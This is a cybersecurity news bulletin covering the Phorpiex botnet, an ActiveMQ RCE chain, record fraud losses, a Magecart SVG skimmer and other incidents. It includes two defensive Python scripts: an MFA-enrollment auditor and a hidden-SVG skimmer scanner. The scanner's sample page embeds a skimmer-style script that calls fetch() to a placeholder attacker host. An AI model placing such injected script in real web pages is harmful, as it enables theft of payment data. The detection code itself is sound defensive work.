ThreatsDay Bulletin: Hybrid P2P Botnet Surges, 13-Year-Old Apache RCE Exploited, and Record $17.7 Billion Cyber Fraud Losses
In the ever-evolving landscape of cybersecurity, recent developments highlight a troubling trend: the resurgence of old vulnerabilities and the emergence of sophisticated cyber threats that exploit trusted platforms. This week, the cybersecurity community is grappling with a range of incidents, from a resilient hybrid botnet to alarming statistics on cyber fraud losses.
Resilient Hybrid Botnet Surge
A new variant of the Phorpiex botnet, also known as Trik, has been identified utilizing a hybrid communication model that merges traditional command-and-control (C2) HTTP polling with a peer-to-peer (P2P) protocol. This approach allows the botnet to maintain operational continuity even in the face of server takedowns. The Phorpiex Twizt variant primarily aims to deploy a clipper that reroutes cryptocurrency transactions, while also distributing high-volume sextortion email spam and facilitating ransomware deployment, including variants like LockBit Black.
According to Bitsight, the Phorpiex botnet has shown a remarkable ability to adapt, evolving from a simple spam operation into a sophisticated platform. Currently, it is responsible for approximately 125,000 infections daily, with the most affected regions being Iran, Uzbekistan, China, Kazakhstan, and Pakistan.
Chained Flaws Enable Stealth RCE
In a significant security revelation, a remote code execution (RCE) vulnerability in Apache ActiveMQ Classic, which has persisted for 13 years, can be exploited in conjunction with an older flaw (CVE-2024-32114) to bypass authentication. This newly identified vulnerability, tracked as CVE-2026-34197, allows attackers to invoke management operations through the Jolokia API, tricking the message broker into executing remote commands.
Horizon3.ai researchers have noted that while the vulnerability typically requires credentials, default credentials are common in many environments, making it easier for attackers to exploit. In certain versions, no credentials are necessary due to another vulnerability that exposes the Jolokia API without authentication. This flaw has been addressed in ActiveMQ Classic versions 5.19.4 and 6.2.3.
Cyber Fraud Losses Hit Record Highs
The financial impact of cyber-enabled fraud continues to escalate, with victims reporting losses exceeding $17.7 billion in 2025 alone. This figure represents a staggering 26% increase from the previous year, with cyber-enabled fraud accounting for nearly 85% of all losses reported to the Internet Crime Complaint Center (IC3). Cryptocurrency investment fraud emerged as the leading source of financial losses, with $7.2 billion reported.
Investment scams overall led to $8.6 billion in losses, followed by business email compromise and tech support scams. The rise of ransomware variants has also contributed to significant financial damage, with 63 new variants identified last year, resulting in over $32 million in losses.
AI-Driven DDoS Tactics Escalate
Data from NETSCOUT reveals that over 8 million DDoS attacks were recorded across 203 countries and territories between July and December 2025. While the overall attack count remained stable, the sophistication of these attacks has dramatically increased. The emergence of the TurboMirai class of IoT botnets, including AISURU and Eleven11, has raised concerns, as DDoS-for-hire platforms now integrate dark-web large language models (LLMs) and conversational AI. This trend lowers the technical barrier for launching complex, multi-vector attacks, allowing even unskilled threat actors to orchestrate sophisticated campaigns.
Insider Breach Exposes Private Photos
A former employee of Meta in the U.K. is under investigation for allegedly downloading approximately 30,000 private photos from Facebook. The accused reportedly developed a software program to evade internal security systems and access users’ private images. Meta discovered the breach over a year ago, terminated the employee, and referred the case to law enforcement. The company has also notified affected users, although the exact number remains unclear.
Help Desk Attacks Enable Enterprise Breaches
Google is currently tracking a financially motivated threat cluster known as UNC6783, linked to the “Raccoon” persona. This group targets high-profile organizations by compromising business process outsourcing (BPO) providers and help desk staff for data extortion. The campaign employs live chat social engineering tactics to direct employees to spoofed Okta logins, utilizing domains that mimic legitimate support channels.
Organizations are advised to prioritize FIDO2 hardware keys for high-risk roles, monitor live chat for suspicious links, and regularly audit newly enrolled multi-factor authentication (MFA) devices.
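The audit of newly enrolled MFA devices recommended above can be made routine by correlating enrollment events with the help-desk activity that precedes them. The script below is an added example, not code from the article or from Google; its JSON-lines event format, field names and event names (`mfa.factor.reset`, `mfa.factor.enrolled`, `login.success`) are constructed for illustration and are not any identity provider's real log schema. It flags an enrollment when it follows a reset performed by someone other than the user, originates from a country absent from the user's recent logins, or puts a non-phishing-resistant factor on a high-risk role.

```python
"""Audit newly enrolled MFA factors against recent help-desk resets.

Added example; the event format and field names are hypothetical and do
not correspond to any vendor's real log schema.
"""
import json
from datetime import datetime, timedelta

# Constructed sample events (not real logs), newest last.
SAMPLE_LOG = """\
{"ts": "2026-04-01T08:55:00Z", "event": "login.success", "user": "bob", "actor": "bob", "country": "US", "role": "engineer"}
{"ts": "2026-04-01T09:00:00Z", "event": "login.success", "user": "alice", "actor": "alice", "country": "US", "role": "admin"}
{"ts": "2026-04-01T10:00:00Z", "event": "mfa.factor.reset", "user": "alice", "actor": "helpdesk-01", "country": "US", "role": "admin"}
{"ts": "2026-04-01T10:12:00Z", "event": "mfa.factor.enrolled", "user": "alice", "actor": "alice", "country": "NL", "role": "admin", "factor": "sms"}
{"ts": "2026-04-01T11:00:00Z", "event": "mfa.factor.enrolled", "user": "bob", "actor": "bob", "country": "US", "role": "engineer", "factor": "fido2"}
"""

PHISHING_RESISTANT = frozenset({"fido2", "webauthn"})
HIGH_RISK_ROLES = frozenset({"admin", "finance", "helpdesk"})  # hypothetical role names
RESET_EVENTS = frozenset({"mfa.factor.reset", "password.reset"})


def parse_events(text):
    """Parse JSON lines into dicts with a timezone-aware datetime, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def audit_enrollments(events, window=timedelta(hours=24)):
    """Return one finding per MFA enrollment that deserves a human look."""
    findings = []
    for i, ev in enumerate(events):
        if ev["event"] != "mfa.factor.enrolled":
            continue
        user = ev["user"]
        # Only this user's events inside the look-back window, before the enrollment.
        history = [e for e in events[:i] if e["user"] == user and ev["ts"] - e["ts"] <= window]
        reasons = []
        # 1. Enrollment shortly after a reset performed by someone other than the user
        #    (the help-desk path the campaign abuses).
        for prior in history:
            if prior["event"] in RESET_EVENTS and prior["actor"] != user:
                minutes = int((ev["ts"] - prior["ts"]).total_seconds() // 60)
                reasons.append(f"enrolled {minutes} min after {prior['event']} by {prior['actor']}")
        # 2. Enrollment from a country not seen in the user's recent successful logins.
        seen = {e["country"] for e in history if e["event"] == "login.success"}
        if seen and ev["country"] not in seen:
            reasons.append(f"enrollment country {ev['country']} not in recent login countries {sorted(seen)}")
        # 3. A high-risk role enrolling a factor that is not phishing-resistant.
        if ev["role"] in HIGH_RISK_ROLES and ev["factor"] not in PHISHING_RESISTANT:
            reasons.append(f"high-risk role {ev['role']} enrolled non-phishing-resistant factor {ev['factor']}")
        if reasons:
            findings.append({"user": user, "factor": ev["factor"], "ts": ev["ts"].isoformat(), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_enrollments(parse_events(SAMPLE_LOG)):
        print(finding["user"], finding["factor"], *finding["reasons"], sep="\n  ")
```

On the sample data only alice's SMS enrollment is reported, with all three reasons; bob's FIDO2 enrollment from his usual country passes. The three checks are independent, so a single reason is enough to surface an enrollment for review.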
Magecart Skimmer Hides in SVG
A large-scale Magecart campaign has been detected using invisible 1×1 pixel SVG elements to inject a fake checkout overlay on 99 Magento e-commerce stores. This skimmer exfiltrates payment data to six attacker-controlled domains. The likely entry vector for this attack is the PolyShell vulnerability, which continues to affect unprotected Magento stores. The skimmer displays a convincing “Secure Checkout” overlay, capturing payment details before redirecting users to the legitimate checkout page.
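A storefront owner can look for the pattern described above, an invisible SVG that carries script or references an unexpected host, by scanning the rendered checkout HTML. The scanner below is an added example and not code from the article or from any of the reports it summarises; the sample page, the allowlist of first-party hosts and the hostname `collect.attacker-example.invalid` are constructed placeholders. It uses only the standard library and reports an SVG when it is 1×1 or styled invisible and contains `<script>`, `<foreignObject>`, an `on*` event handler, or a URL to a host outside the allowlist.

```python
"""Scan checkout HTML for invisible SVG elements that carry script or
reference unexpected hosts. Added example; sample page and hosts are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed first-party allowlist: any other host referenced from inside a hidden SVG is reported.
ALLOWED_HOSTS = frozenset({"shop.example", "cdn.shop.example"})
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")
EVENT_ATTR_RE = re.compile(r"^on[a-z]+$")

# Constructed sample page: a normal logo SVG plus a 1x1 SVG that embeds script.
SAMPLE_HTML = """
<html><body>
<svg width="120" height="40" viewBox="0 0 120 40"><text x="0" y="30">Shop</text></svg>
<form id="checkout" action="https://shop.example/checkout"><input name="card"></form>
<svg width="1" height="1" style="position:absolute;opacity:0">
  <script>
    /* overlay construction would go here in a real skimmer; omitted */
    fetch("https://collect.attacker-example.invalid/p");
  </script>
</svg>
</body></html>
"""


def _dimension(value):
    """Parse '1', '1px' or '1.0' into a float; None when not numeric."""
    if value is None:
        return None
    m = re.match(r"^\s*([0-9]*\.?[0-9]+)\s*(px)?\s*$", value)
    return float(m.group(1)) if m else None


def _is_invisible(attrs):
    """True for a 1x1 (or smaller) SVG or one hidden through inline style."""
    w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    style = (attrs.get("style") or "").replace(" ", "").lower()
    tiny = w is not None and h is not None and w <= 1 and h <= 1
    hidden = any(s in style for s in ("opacity:0", "visibility:hidden", "display:none"))
    return tiny or hidden


class SvgScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.svg_stack = []   # one context per open <svg>
        self.findings = []

    def _hosts_in(self, text, ctx):
        for url in URL_RE.findall(text or ""):
            host = urlparse(url).hostname
            if host and host not in ALLOWED_HOSTS:
                ctx["hosts"].add(host)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # html.parser lowercases tag and attribute names
        if tag == "svg":
            self.svg_stack.append({"invisible": _is_invisible(attrs), "reasons": [], "hosts": set()})
        if not self.svg_stack:
            return
        ctx = self.svg_stack[-1]
        if tag in ("script", "foreignobject"):
            ctx["reasons"].append(f"<{tag}> inside svg")
        for name, value in attrs.items():
            if EVENT_ATTR_RE.match(name):
                ctx["reasons"].append(f"{name} handler on <{tag}>")
            self._hosts_in(value, ctx)

    def handle_data(self, data):
        # Script bodies arrive here, so external hosts inside inline script are caught too.
        if self.svg_stack:
            self._hosts_in(data, self.svg_stack[-1])

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_stack:
            ctx = self.svg_stack.pop()
            if ctx["invisible"] and (ctx["reasons"] or ctx["hosts"]):
                self.findings.append({"reasons": ctx["reasons"], "hosts": sorted(ctx["hosts"])})


def scan_html(html):
    """Return a list of findings, one per suspicious invisible SVG."""
    scanner = SvgScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print("suspicious hidden SVG:", finding)
```

The visible 120×40 logo is ignored; only the 1×1 SVG is reported, with the embedded `<script>` and the non-allowlisted host as evidence. Running this against a saved copy of the live checkout page, rather than the source in the repository, is what catches content injected at serve time.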
Linux SMB Flaw Leaks Crypto Keys
A high-severity vulnerability has been disclosed in the Linux kernel’s ksmbd SMB3 server, tracked as CVE-2026-23226. This flaw allows attackers to leak the per-channel AES-128-CMAC signing key used to sign all SMB3 traffic, potentially enabling them to forge signatures and impersonate the server. The vulnerability has been addressed in a recent patch.
Conclusion
The cybersecurity landscape is witnessing a confluence of old vulnerabilities being exploited in new ways, alongside the emergence of sophisticated threats leveraging trusted platforms. Organizations must remain vigilant, patch vulnerabilities, and audit their security measures to mitigate risks effectively.
Source: thehackernews.com


